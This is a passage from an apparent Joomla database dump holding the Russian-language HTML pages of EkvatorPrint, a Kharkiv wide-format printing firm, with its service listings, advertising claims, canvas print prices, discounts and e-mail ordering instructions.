/></a></p>\r\n</td>\r\n<td>&nbsp;</td>\r\n<td style=\"width: 100px;\">\r\n<p style=\"text-align: center;\"><a title=\"печать фотообоев\" href=\"print-photo\"><img src=\"images/stories/zakat-100.jpg\" alt=\"печать фотообоев\" width=\"92\" height=\"120\" /></a></p>\r\n</td>\r\n<td>&nbsp;</td>\r\n<td style=\"width: 100px;\">\r\n<p style=\"text-align: center;\"><a title=\"печать флагов\" href=\"print-flags\"><img src=\"images/stories/flag.jpg\" alt=\"широкоформатная печать флагов\" width=\"92\" height=\"120\" /></a></p>\r\n</td>\r\n<td>&nbsp;</td>\r\n<td style=\"width: 100px;\">\r\n<p style=\"text-align: center;\"><a title=\"печать ситилайтов\" href=\"print-citylights\"><img src=\"images/stories/sitilajt.jpg\" alt=\"печать на бумаге ситик\" width=\"92\" height=\"120\" /></a></p>\r\n</td>\r\n<td>&nbsp;</td>\r\n<td>\r\n<p style=\"text-align: center;\"><a href=\"modulnye-kartiny\"><img src=\"images/modulnie%20kartini/modulnie_kartini.jpg\" alt=\"Модульные картины\" /></a></p>\r\n</td>\r\n<td>&nbsp;</td>\r\n<td>\r\n<p style=\"text-align: center;\"><a href=\"printing-on-an-awning\"><img src=\"images/stories/tent.jpg\" alt=\"печать тентов\" width=\"92\" height=\"120\" /></a></p>\r\n</td>\r\n</tr>\r\n<tr style=\"background-color: #99ccff;\">\r\n<td style=\"text-align: center;\"><a title=\"печать больших фотографий\" href=\"print-great-photos\">Печать больших фотографий</a></td>\r\n<td style=\"background-color: #ffffff;\">&nbsp;</td>\r\n<td style=\"text-align: center;\"><a title=\"печать фотообоев Харьков\" href=\"print-photo\">Печать фотообоев</a></td>\r\n<td style=\"background-color: #ffffff;\">&nbsp;</td>\r\n<td style=\"text-align: center;\"><span style=\"color: #000000;\"><a title=\"широкоформатная печать флагов\" href=\"print-flags\">Печать флагов</a><br /></span></td>\r\n<td style=\"background-color: #ffffff;\">&nbsp;</td>\r\n<td style=\"text-align: center;\"><span style=\"color: #000000;\"><a title=\"широкоформатная печать сити лайтов\" href=\"print-citylights\">Печать сити лайтов</a></span></td>\r\n<td style=\"background-color: #ffffff;\">&nbsp;</td>\r\n<td style=\"text-align: center;\"><a href=\"modulnye-kartiny\">Модульные картины</a></td>\r\n<td style=\"background-color: #ffffff;\">&nbsp;</td>\r\n<td style=\"text-align: center;\"><a href=\"printing-on-an-awning\">Печать на тенте</a></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p>&nbsp;</p>\r\n<table style=\"width: 725px; height: 1265px;\" cellpadding=\"10\" border=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td>\r\n<p><img style=\"margin-top: 5px; margin-bottom: 5px; border: 0px none; float: left;\" title=\"широкоформатная печать Харьков\" src=\"images/stories/kraski.jpg\" alt=\"печать широкоформатная преимущества\" width=\"50\" /></p>\r\n<h2 style=\"text-align: center; font-size: 150%;\">Широкоформатная печать в \"ЭкваторПринт\" - печать для рекламы и интерьера</h2>\r\n<div style=\"border-left: 8px solid #FFF300; background: #d8f6fe; color: #000; text-align: justify;\">\r\n<div style=\"margin: 30px;\">\r\n<p style=\"font-size: 170%; font-weight: bolder; padding: 5px;\">Наши преимущества:</p>\r\n<p><span style=\"font-size: 130%;\">1. Благодаря чернилам предназначенным для наружной рекламы, наши изделия имеют <strong>длительный срок наружного применения.</strong> </span></p>\r\n<p><span style=\"font-size: 130%;\">2. Правильная цветопередача и яркие <strong>насыщенные цвета</strong>.</span></p>\r\n<p><span style=\"font-size: 130%;\">3. Максимально <strong>короткие сроки</strong> выполнения заказа.</span></p>\r\n<p><span style=\"font-size: 130%;\">4. Высококачественные <strong>проверенные материалы.</strong></span></p>\r\n<p><span style=\"font-size: 130%;\">5. Возможность <em>интерьерной печати</em> 1440dpi</span></p>\r\n</div>\r\n</div>\r\n<div style=\"font-size: 120%;\">\r\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\"><strong>Широкоформатная печать</strong> - это цифровая многокрасочная цветная печать на рулонных материалах. В Харькове и других городах Украины печать широкоформатная активно используется для изготовления наружной рекламы, при оформлении интерьеров помещений, на выставках.</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">\"<strong>ЭкваторПринт</strong>\" - это лучший путь выполнения заказа, если вам необходимо выполнить <strong>широкоформатную печать на каком-либо виде рулонных материалов</strong>: на холсте, на пленке, на сетке, на самоклейке, на баннерной ткани, изготовить фотообои, флаги и ситилайтов. Мы осуществляем печать для самых разных задач.</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Мы любим своих клиентов, поэтому предлагаем высокое качество, быстрые сроки выполнения заказа и приемлемые цены.</span></p>\r\n</div>\r\n<p>&nbsp;</p>\r\n<div style=\"font-size: 130%;\">\r\n<h3 style=\"text-align: left;\">Широкоформатная печать – преимущества наружной рекламы:</h3>\r\n<p style=\"text-align: justify;\">В Харькове - наружная реклама наиболее удобный и выгодный путь рекламы услуг, товаров, работ. Преимущества ясны и понятны.</p>\r\n<p style=\"text-align: justify;\"><img style=\"margin-left: 5px; margin-right: 5px; float: left;\" src=\"images/stories/1.gif\" alt=\"Переимущество широкоформатной печати 1 - охват большой аудитории\" width=\"50\" height=\"80\" /><span style=\"color: #0000ff; font-size: 120%;\">Охват миллионной аудитории.</span><br />Яркие, большие и броские постеры, баннеры, вывески, билбоды, ситилайты – создают бренд компании, поддерживают ее имидж, и успешно рекламируют ваш продукт в городе миллионере.</p>\r\n<p><img style=\"margin-left: 5px; margin-right: 5px; float: left;\" src=\"images/stories/2.gif\" alt=\"преимущество 2 - интерьерная печать\" width=\"50\" height=\"80\" /><span style=\"font-size: 120%; color: #0000ff;\">Интерьерное оформление и реклама.</span><br /><span style=\"color: #000000;\">В качестве <em>интерьерной рекламы</em>, продукция &nbsp;широкофрматной печати также эффективна, она выступает и как элемент корпоративного стиля, а вместе с тем поддерживает интерес к компании и увеличивает количество клиентов и партнеров.</span></p>\r\n<p style=\"text-align: justify;\"><img style=\"margin-left: 5px; margin-right: 5px; float: left;\" src=\"images/stories/3.gif\" alt=\"3 широкоформатная печать повышает узнаваемость бренда\" width=\"50\" height=\"80\" /><span style=\"font-size: 120%; color: #0000ff;\">Повышает узнаваемость бренда.</span><br /><span style=\"color: #000000;\">Каким бы видом деятельности Вы не занимались, офф-лайновая реклама всегда будет вам «на руку». Ведь каждый, проходящий мимо ваших \"вывесок\", подсознательно, сам того не замечая, <strong>запоминает вашу фирму</strong>, логотип компании, и ваш товар/услугу. И при случае необходимости, представ перед выбором компании, он обратится в ту, которая ему уже знакома. Печать широкоформатная - отличный способ повысить узнаваемость бренда!</span></p>\r\n<p style=\"text-align: justify;\"><img style=\"margin-left: 5px; margin-right: 5px; float: left;\" src=\"images/stories/4.gif\" alt=\"4 печать широкоформатная - это выгодно!\" width=\"50\" height=\"80\" /><span style=\"font-size: 120%; color: #0000ff;\">Выгодно.</span><br /><span style=\"color: #000000;\">Размещая наружную рекламу, вы получаете сравнительно <strong>не дорогой способ рекламы</strong>. При малой себестоимости, такая рекламная продукция имеет высокое качество, она практична и прослужит долгий период времени с сохранением яркого и четкого внешнего вида.</span></p>\r\n<br />\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: justify;\"><img style=\"margin-left: 5px; margin-right: 5px; float: left;\" src=\"images/stories/5.gif\" alt=\"Широкоформатна печать городе Харьков - это круглосуточная реклама\" width=\"50\" height=\"80\" /><span style=\"font-size: 120%; color: #0000ff;\">Круглосуточно</span><br /><span style=\"color: #000000;\"><strong>Широкоформатная печать</strong> это путь сделать презентацию вашего товара/услуги круглосуточной. Ведь жизнь в городе <strong>Харьков</strong> насыщенна, и разместив баннер, ситилайт, билборд или другую наружную рекламу в удачном месте – вас увидят сотни тысяч прохожих и проезжих. А поскольку Харьков активен и днем и ночью – то широкоформатная печать 100% выполняет свои функции <strong>круглосуточно</strong>.&nbsp;</span></p>\r\n</div>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 140%;\">Компания ЭкваторПринт осуществляет <em>широкоформатную печать в городе Харьков</em>&nbsp;в сроки 1-3 рабочих дня. Доставка осуществляется во все города Украины курьерской службой Новая Почта. </span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 170%; color: #0000ff;\">Если у Вас появилась потребность в&nbsp;<em>широкоформатной печати</em>&nbsp;и Вы хотите чтоб все было&nbsp;<strong>надежно</strong>,&nbsp;<strong>качественно</strong>&nbsp;и&nbsp;<strong>в срок</strong>, обращайтесь к нам</span>.</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table style=\"width: 330px; clear: both;\" border=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td style=\"text-align: center;\"><a href=\"index.php?option=com_content&amp;view=article&amp;id=1&amp;Itemid=2\"><img style=\"border: 0pt none;\" src=\"images/stories/printer.png\" alt=\"print\" width=\"50\" height=\"50\" border=\"0\" /><br /></a>\r\n<p style=\"text-align: center;\"><a href=\"equipment\">Оборудование</a></p>\r\n</td>\r\n<td style=\"text-align: center;\"><a title=\"широкоформатная печать Харьков цена\" href=\"index.php?option=com_content&amp;view=article&amp;id=2&amp;Itemid=3\"><img style=\"border: 0pt none;\" src=\"images/stories/Documents.png\" alt=\"doc\" width=\"50\" height=\"50\" border=\"0\" /><br /></a>\r\n<p><a title=\"широкоформатная печать Харьков цена\" href=\"price\">Прайс-лист</a></p>\r\n</td>\r\n<td style=\"text-align: center;\"><a href=\"index.php?option=com_content&amp;view=article&amp;id=3&amp;Itemid=4\"><img style=\"border: 0pt none;\" src=\"images/stories/Map.png\" alt=\"map\" width=\"50\" height=\"50\" border=\"0\" /></a>\r\n<p><a href=\"contacts\">Контакты</a></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','',1,8,'2010-11-06 16:25:59',62,'','2020-07-21 12:59:26',62,0,'0000-00-00 00:00:00','2010-11-06 16:25:59','0000-00-00 00:00:00','','','{\"article_layout\":\"\",\"show_title\":\"0\",\"link_titles\":\"0\",\"show_tags\":\"\",\"show_intro\":\"0\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"0\",\"link_category\":\"0\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"0\",\"link_author\":\"\",\"show_create_date\":\"0\",\"show_modify_date\":\"0\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"0\",\"show_email_icon\":\"0\",\"show_vote\":\"0\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',338,27,'широкоформатная печать харьков, интерьерная печать','Качественная широкоформатная печать, интерьерная печать,печать рекламы в  Харькове. Доставка по всей Украине. Цены от производителя.',1,500581,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*','',''),(5,39,'Услуги','2010-12-01-14-37-59','<h3 style=\"text-align: center;\"><strong>Широкоформатная печать на рулонных материалах:</strong></h3>\r\n<table border=\"0\" align=\"center\">\r\n	<tbody>\r\n		<tr style=\"height: 20px;\">\r\n			<td style=\"background-color: #99ccff;\">&nbsp;</td>\r\n			<td>&nbsp;</td>\r\n			<td style=\"background-color: #99ccff;\">&nbsp;</td>\r\n			<td>&nbsp;</td>\r\n			<td style=\"background-color: #99ccff;\">&nbsp;</td>\r\n			<td>&nbsp;</td>\r\n			<td style=\"background-color: #99ccff;\">&nbsp;</td>\r\n			<td>&nbsp;</td>\r\n			<td style=\"background-color: #99ccff;\">&nbsp;</td>\r\n		</tr>\r\n		<tr valign=\"top\">\r\n			<td style=\"width: 120px;\">\r\n				<p style=\"text-align: center;\">\r\n					<a href=\"index.php?option=com_content&amp;view=article&amp;id=6&amp;Itemid=7\" title=\"печать на холсте\"><img src=\"images/stories/xolst.jpg\" border=\"0\" /></a>\r\n				</p>\r\n			</td>\r\n			<td>&nbsp;</td>\r\n			<td style=\"width: 120px;\">\r\n				<p style=\"text-align: center;\">\r\n					<a href=\"index.php?option=com_content&amp;view=article&amp;id=7&amp;Itemid=8\" title=\"печать на виниле\"><img src=\"images/stories/vinil-s.jpg\" border=\"0\" style=\"border: 1px solid grey;\" /></a>\r\n				</p>\r\n			</td>\r\n			<td>&nbsp;</td>\r\n			<td style=\"width: 120px;\">\r\n				<p style=\"text-align: center;\">\r\n					<a href=\"index.php?option=com_content&amp;view=article&amp;id=8&amp;Itemid=9\" title=\"баннер печать\"><img src=\"images/stories/banner-s.jpg\" border=\"0\" style=\"border: 1px solid grey;\" /></a>\r\n				</p>\r\n			</td>\r\n			<td>&nbsp;</td>\r\n			<td style=\"width: 120px;\">\r\n				<p style=\"text-align: center;\">\r\n					<a href=\"index.php?option=com_content&amp;view=article&amp;id=9&amp;Itemid=10\" title=\"печать на сетке баннерной\"><img src=\"images/stories/setka-s.jpg\" border=\"0\" style=\"border: 1px solid grey;\" /></a>\r\n				</p>\r\n			</td>\r\n			<td>&nbsp;</td>\r\n			<td>\r\n				<p style=\"text-align: center;\">\r\n					<a href=\"index.php?option=com_content&amp;view=article&amp;id=18&amp;Itemid=19\" title=\"печать бигбордов\"><img src=\"images/stories/pechat-bigbordov.jpg\" border=\"0\" alt=\"печать билбордов бигбордов\" title=\"печать билбордов\" style=\"border: 1px solid grey;\" /></a>\r\n				</p>\r\n			</td>\r\n		</tr>\r\n		<tr style=\"background-color: #99ccff;\">\r\n			<td style=\"text-align: center;\"><span style=\"color: #000000;\"><a href=\"index.php?option=com_content&amp;view=article&amp;id=6&amp;Itemid=7\" title=\"печать на холсте\">Печать на холсте</a></span></td>\r\n			<td style=\"background-color: #ffffff;\">&nbsp;</td>\r\n			<td style=\"text-align: center;\"><span style=\"color: #000000;\"><a href=\"index.php?option=com_content&amp;view=article&amp;id=7&amp;Itemid=8\" title=\"печать на виниле\">Печать на виниле, самоклейке</a></span><span style=\"color: #000000;\"><br /></span></td>\r\n			<td style=\"background-color: #ffffff;\">&nbsp;</td>\r\n			<td style=\"text-align: center;\"><span style=\"color: #000000;\"><a href=\"index.php?option=com_content&amp;view=article&amp;id=8&amp;Itemid=9\" title=\"баннер печать\">Баннер печать</a></span></td>\r\n			<td style=\"background-color: #ffffff;\">&nbsp;</td>\r\n			<td style=\"text-align: center;\"><span style=\"color: #000000;\"><a href=\"index.php?option=com_content&amp;view=article&amp;id=9&amp;Itemid=10\" title=\"печать на сетке баннерной\">Печать на сетке баннерной</a></span></td>\r\n			<td style=\"background-color: #ffffff;\">&nbsp;</td>\r\n			<td><a href=\"index.php?option=com_content&amp;view=article&amp;id=18&amp;Itemid=19\" title=\"печать билбордов\">Печать билбордов</a></td>\r\n		</tr>\r\n	</tbody>\r\n</table>\r\n<table border=\"0\" align=\"center\">\r\n	<tbody>\r\n		<tr style=\"height: 10px;\">\r\n			<td>&nbsp;</td>\r\n			<td>&nbsp;</td>\r\n			<td>&nbsp;</td>\r\n			<td>&nbsp;</td>\r\n			<td>&nbsp;</td>\r\n			<td>&nbsp;</td>\r\n			<td>&nbsp;</td>\r\n			<td>&nbsp;</td>\r\n			<td>&nbsp;</td>\r\n			<td>&nbsp;</td>\r\n		</tr>\r\n		<tr valign=\"top\">\r\n			<td>&nbsp;</td>\r\n			<td style=\"width: 120px;\">\r\n				<p style=\"text-align: center;\">\r\n					<a href=\"index.php?option=com_content&amp;view=article&amp;id=13&amp;Itemid=14\" title=\"печать фотообоев\"><img src=\"images/stories/zakat-100.jpg\" border=\"0\" style=\"border: 1px solid grey;\" /></a>\r\n				</p>\r\n			</td>\r\n			<td>&nbsp;</td>\r\n			<td style=\"width: 120px;\">\r\n				<p style=\"text-align: center;\">\r\n					<a href=\"index.php?option=com_content&amp;view=article&amp;id=14&amp;Itemid=15\" title=\"печать флагов\"><img src=\"images/stories/flag.jpg\" border=\"0\" style=\"border: 1px solid grey;\" /></a>\r\n				</p>\r\n			</td>\r\n			<td>&nbsp;</td>\r\n			<td style=\"width: 120px;\">\r\n				<p style=\"text-align: center;\">\r\n					<a href=\"index.php?option=com_content&amp;view=article&amp;id=15&amp;Itemid=16\" title=\"печать ситилайтов\"><img src=\"images/stories/sitilajt.jpg\" border=\"0\" style=\"border: 1px solid grey;\" /></a>\r\n				</p>\r\n			</td>\r\n			<td>&nbsp;</td>\r\n			<td>\r\n				<p style=\"text-align: center;\">\r\n					<a href=\"index.php?option=com_content&amp;view=article&amp;id=16&amp;Itemid=17\"><img src=\"images/stories/potolok-gl.jpg\" border=\"0\" width=\"100\" height=\"123\" style=\"border: 1px solid grey;\" /></a>\r\n				</p>\r\n			</td>\r\n			<td>&nbsp;</td>\r\n			<td>\r\n				<p style=\"text-align: center;\">\r\n					<a href=\"index.php?option=com_content&amp;view=article&amp;id=17&amp;Itemid=18\"><img src=\"images/stories/tent.jpg\" border=\"0\" width=\"100\" height=\"123\" style=\"border: 1px solid grey;\" /></a>\r\n				</p>\r\n			</td>\r\n		</tr>\r\n		<tr style=\"background-color: #99ccff;\">\r\n			<td style=\"background-color: #ffffff;\">&nbsp;</td>\r\n			<td style=\"text-align: center;\"><a href=\"index.php?option=com_content&amp;view=article&amp;id=13&amp;Itemid=14\" title=\"печать фотообоев Харьков\">Печать фотообоев</a></td>\r\n			<td style=\"background-color: #ffffff;\">&nbsp;</td>\r\n			<td style=\"text-align: center;\"><span style=\"color: #000000;\"><a href=\"index.php?option=com_content&amp;view=article&amp;id=14&amp;Itemid=15\" title=\"широкоформатная печать флагов\">Печать флагов</a><br /></span></td>\r\n			<td style=\"background-color: #ffffff;\">&nbsp;</td>\r\n			<td style=\"text-align: center;\"><span style=\"color: #000000;\"><a href=\"index.php?option=com_content&amp;view=article&amp;id=15&amp;Itemid=16\" title=\"широкоформатная печать сити лайтов\">Печать сити лайтов</a></span></td>\r\n			<td style=\"background-color: #ffffff;\">&nbsp;</td>\r\n			<td style=\"text-align: center;\"><a href=\"index.php?option=com_content&amp;view=article&amp;id=16&amp;Itemid=17\" title=\"печать на натяжных потолках\">Печать на натяжных<br /> потолках</a></td>\r\n			<td style=\"background-color: #ffffff;\">&nbsp;</td>\r\n			<td style=\"text-align: center;\"><a href=\"index.php?option=com_content&amp;view=article&amp;id=17&amp;Itemid=18\">Печать на тенте</a></td>\r\n		</tr>\r\n	</tbody>\r\n</table>\r\n<table style=\"width: 700px;\" border=\"0\" align=\"center\">\r\n	<tbody>\r\n		<tr valign=\"top\">\r\n			<td style=\"width: 350px;\">\r\n				<h3 style=\"text-align: center;\"><a href=\"index.php?option=com_content&amp;view=article&amp;id=11&amp;Itemid=12\" title=\"Изготовление наружной рекламы\"><strong>Изготовление наружной рекламы</strong></a></h3>\r\n			</td>\r\n			<td>\r\n				<h3 style=\"text-align: center;\"><a href=\"index.php?option=com_content&amp;view=article&amp;id=10&amp;Itemid=11\" title=\"печать больших фотографий\"><strong>Печать больших фотографий</strong></a></h3>\r\n			</td>\r\n		</tr>\r\n		<tr>\r\n			<td style=\"text-align: left;\">\r\n				<a href=\"index.php?option=com_content&amp;view=article&amp;id=11&amp;Itemid=12\" title=\"изготовление наружной рекламы\"><img src=\"images/stories/narugnaja-kreativ-reklama-s.jpg\" border=\"0\" style=\"border: 1px solid black; float: left; margin-left: 10px; margin-right: 10px;\" /></a>Мы обеспечим Вам качественное <strong>изготовление наружной рекламы</strong>: изготовление баннера и изготовление вывесок. Ваша&nbsp;реклама на улицах, на билбордах, на магазинах будет яркой, сочной и привлекательной.</td>\r\n			<td style=\"text-align: left;\">\r\n				<a href=\"index.php?option=com_content&amp;view=article&amp;id=10&amp;Itemid=11\"><img src=\"images/stories/photo.jpg\" border=\"0\" alt=\"печать больших фотографий\" title=\"печать больших фотографий\" style=\"border: 1px solid grey; float: left; margin-left: 10px; margin-right: 10px;\" /></a><strong>Печать больших фотографий</strong> на нашем оборудовании обеспечит точную цветопередачу и высокое качество изображения.</td>\r\n		</tr>\r\n		<tr>\r\n			<td>\r\n				<p>&nbsp;</p>\r\n				<p>Интересно о:</p>\r\n				<p>- <a href=\"index.php?option=com_content&amp;view=article&amp;id=12&amp;Itemid=13\" title=\"цифровая печать Харьков\">Что такое цифровая печать</a></p>\r\n			</td>\r\n			<td>&nbsp;</td>\r\n		</tr>\r\n	</tbody>\r\n</table>','',0,8,'2010-12-01 14:37:41',62,'','2018-07-19 13:01:48',62,0,'0000-00-00 00:00:00','2010-12-01 14:37:41','0000-00-00 00:00:00','','','{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',79,26,'широкоформатная печать Харьков, изготовление наружной рекламы, печать больших фотографий.','Широкоформатная печать на рулонных материаллах: холст, винил, пленка, баннер, сетка. Изготовление наружной рекламы. Печать больших фотографий.',1,10903,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(6,40,'Печать на холсте','print','<h1 style=\"text-align: center;\">Печать на холсте <strong><span style=\"color: #0000ff;\">(ФОТОКАЧЕСТВО)</span></strong></h1>\r\n<table style=\"height: 260px; width: 720px; margin: 10px;\" border=\"0\">\r\n	<tbody>\r\n		<tr>\r\n			<td>\r\n				<p><img title=\"Фото на холсте с натяжкой на подрамник\" src=\"img/pechat_foto_na_holste.jpg\" alt=\"Печать фото на холсте\" width=\"300\" height=\"303\" /></p>\r\n			</td>\r\n			<td>\r\n				<p style=\"text-align: left;\"><span style=\"font-size: 135%;\"><span style=\"color: #0000ff;\">Стоимость готовых картин на подрамнике:</span></span>\r\n				</p>\r\n				<p><span style=\"font-size: 125%;\"></span></p>\r\n				<p><span style=\"color: #000000;\"><strong style=\"vertical-align: baseline; outline: 0px; padding: 0px; margin: 0px; border: 0px;\">\r\n<table style=\"width: 430px; height: 19px; font-size: 140%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"text-align: left; font-size: 90%;\" colspan=\"2\">(приведены некоторые <strong>стандартные</strong> размеры в сантиметрах. Вы можете <strong>заказать картину любого размера.</strong>)</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>20x30-<strong>113грн.</strong><br /> 30х30-<strong>133грн.<br /> </strong>30х40-<strong>153грн.<br /> </strong>40х50-<strong>198грн.<br /> </strong>40х60-<strong>222грн.<br /> </strong></p>\r\n</td>\r\n<td style=\"text-align: right;\">\r\n<p>50х70-<strong>275грн.<br /> </strong>60x90-<strong>373грн.</strong><br /> 80х80-<strong>438грн.<br /> </strong>75х100-<strong>488грн.<br /> </strong>100х100-<strong>587грн.<br /> </strong></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</strong> </span></p>\r\n			</td>\r\n		</tr>\r\n	</tbody>\r\n</table>\r\n<p style=\"text-align: center; margin: 10px;\"><span style=\"font-size: 200%; color: #0000ff;\"><span style=\"color: #808080;\">Cрок изготовления картин на холсте</span><br /> до 3х рабочих дней</span>\r\n</p>\r\n<h2 style=\"margin: 10px; font-size: 160%; color: #0003f2; text-align: center;\"><strong>ЦЕНА НА ВСЕ РАЗМЕРЫ КАРТИН:</strong><br /> <img src=\"images/canvasprice2.jpg\" alt=\"canvasprice2\" width=\"725\" /></h2>\r\n<p style=\"margin: 10px;\"><img src=\"images/canvasprice3.jpg\" alt=\"canvasprice3\" width=\"350\" height=\"37\" /></p>\r\n<p style=\"margin: 10px; text-align: justify;\"><span style=\"font-size: 115%;\"><strong>*в стоимость входит:</strong> влагостойкий мелкозернистый холст, печать на холсте УФ-устойчивыми чернилами (качество 1440dpi), лаковое покрытие (можно аккуратно протирать влажной тряпочкой), натяжка на подрамник из сухого дерева, установка крепления, упаковка из прозрачной стрейч пленки</span>.</p>\r\n<p style=\"margin: 10px; text-align: justify;\"><span style=\"font-size: 110%;\">Цена картин на подрамнике со стороной больше 100см составляет 1040грн/м2.</span></p>\r\n<p>&nbsp;</p>\r\n<p style=\"margin: 10px; text-align: justify;\"><span style=\"font-size: 135%;\"><span style=\"font-size: 105%;\"><span>При заказе от</span>&nbsp;<span style=\"color: #ff0000; font-size: 120%;\">ДВУХ</span>&nbsp;<span>картин</span>&nbsp;</span>&nbsp;<span style=\"color: #ff0000; font-size: 120%;\">скидка&nbsp;10%.</span></span>\r\n</p>\r\n<p style=\"margin: 10px; text-align: justify;\"><span style=\"font-size: 135%;\"><span style=\"font-size: 105%;\"><span>При заказе от</span>&nbsp;<span style=\"color: #ff0000; font-size: 120%;\">ПЯТИ</span>&nbsp;<span>картин</span>&nbsp;</span>&nbsp;<span style=\"color: #ff0000; font-size: 120%;\">скидка&nbsp;15%.</span></span>\r\n</p>\r\n<div>\r\n	<p style=\"font-style: arial; margin: 10px; text-align: justufy; padding: 4px;\"><span style=\"font-size: 170%;\">Постоянным клиентам</span>&nbsp;<span style=\"font-size: 210%; color: #ff0000;\">скидка 40%</span>.<br />(*для получения скидки 40% в макете необходимо добавлять по полтора сантиметра с каждой стороны,<span style=\"font size: 110%;\"> <strong>которые будут завернуты на торцы подрамника</strong></span>, т.е. если размер картины составляет 60х90см, размер макета холста должен быть 63х93см.).</p>\r\n	<p style=\"margin: 20px; margin-top: 2em; font-size: 130%; border-left: 10px solid #faf27f; padding-left: 10px;\">Как проверить размер исходного файла и подготовить макет под скидку 40%, можно посмотреть в видеоинструкции <a style=\"fotn size: 130%;\" href=\"#maketvideo\">НИЖЕ НА СТРАНИЦЕ</a></p>\r\n</div>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 140%; color: #0000ff;\">Визуализация разных размеров фотокартин:</span></p>\r\n<p><img style=\"margin: 10px;\" src=\"images/razmerfotokartin.jpg\" alt=\"Визуализация разных размеров фотокартин\" width=\"664\" height=\"287\" /></p>\r\n<p>&nbsp;</p>\r\n<p style=\"font-size: 250%; color: #0000ff; margin: 10px;\"><strong>Как заказать <span style=\"font-size: 60%; color: black;\">картину по Вашему фото:</span></strong></p>\r\n<p style=\"margin: 10px; text-align: justify;\"><span style=\"background-color: #ff9900; font-size: 200%;\">Принимаем</span><span style=\"background-color: #ff9900; font-size: 200%;\"> заказы по e-mail.</span>&nbsp;<span style=\"font-size: 155%;\">Для оформления заказа присылайте Ваше фото или картину на нашу электронную почту:</span>&nbsp;<span style=\"font-size: 230%; background-color: #ff9900;\">e@ekvatorprint.com.ua</span> <span style=\"font-size: 140%;\">и напишите размеры картины в сантиметрах<span style=\"font-size: 70%;\"> (к примеру 60х40 если нужна картина высотой 40см и шириной 60см),</span>. Если в заказе одна картина, размеры можно указать в письме, если в заказе более одной картины, пожалуйста подпишите все файлы как на примере ниже.</span><span style=\"font-size: 100%;\"> По умолчанию все картины печатаем с натяжкой на подрамник, если натяжка не нужна, указывайте это при оформлении заказа</span></p>\r\n<p style=\"margin: 10px;\"><img src=\"images/canvasmaket2.jpg\" alt=\"canvasmaket\" width=\"738\" height=\"490\" /></p>\r\n<p>&nbsp;</p>\r\n<div style=\"margin: 10px;\">\r\n	<p><span style=\"font-size: 155%; color: #0000ff;\">Печать на холсте в ЭкваторПринт это:</span></p>\r\n	<p><span style=\"font-size: 115%; text-align: justify; color: #0000ff;\">✔</span><span style=\"font-size: 115%; text-align: justify;\">&nbsp; &nbsp;<strong>ПРАВИЛЬНАЯ ЦВЕТОПЕРЕДАЧА И МАКСИМАЛЬНЫЙ ЦВЕТОВОЙ ОХВАТ</strong></span><span style=\"font-size: 115%; text-align: justify;\">&nbsp;- цвета печати будут максимально соответствовать цветам отображаемым на Вашем мониторе;&nbsp;</span></p>\r\n	<p><span style=\"font-size: 160%;\"><span style=\"color: #0000ff;\">✔</span>&nbsp;&nbsp;&nbsp;<strong>Долгий срок службы</strong></span> <span style=\"font-size: 110%;\">- наша печать на холсте не выгорает и не смывается;</span></p>\r\n	<p><span style=\"font-size: 110%;\"><span style=\"color: #0000ff;\">✔</span>&nbsp; &nbsp;<strong>Качественная печать</strong> и яркие цвета красок;</span>\r\n	</p>\r\n	<p><span style=\"font-size: 110%;\"><span style=\"color: #0000ff;\">✔</span> &nbsp; <strong>Цены от производителя</strong>;</span>\r\n	</p>\r\n	<p><span style=\"font-size: 110%;\"><span style=\"color: #0000ff;\">✔</span>&nbsp; &nbsp;Экологически чистые, УФ-устойчивые чернила;</span>\r\n	</p>\r\n	<p><span style=\"font-size: 110%;\"><span style=\"color: #0000ff;\">✔</span>&nbsp; &nbsp;Отличное украшение интерьера;</span>\r\n	</p>\r\n	<p><span style=\"font-size: 110%;\"><span style=\"color: #0000ff;\">✔</span>&nbsp; &nbsp;Отличная идея подарка;</span>\r\n	</p>\r\n	<p><span style=\"font-size: 110%;\"><span style=\"color: #0000ff;\">✔</span>&nbsp; \"приятная\" цена на печать,&nbsp;<strong>скидки при крупных заказах&nbsp;и постоянным клиентам</strong>;</span>\r\n	</p>\r\n</div>\r\n<div style=\"margin: 10px; text-align: 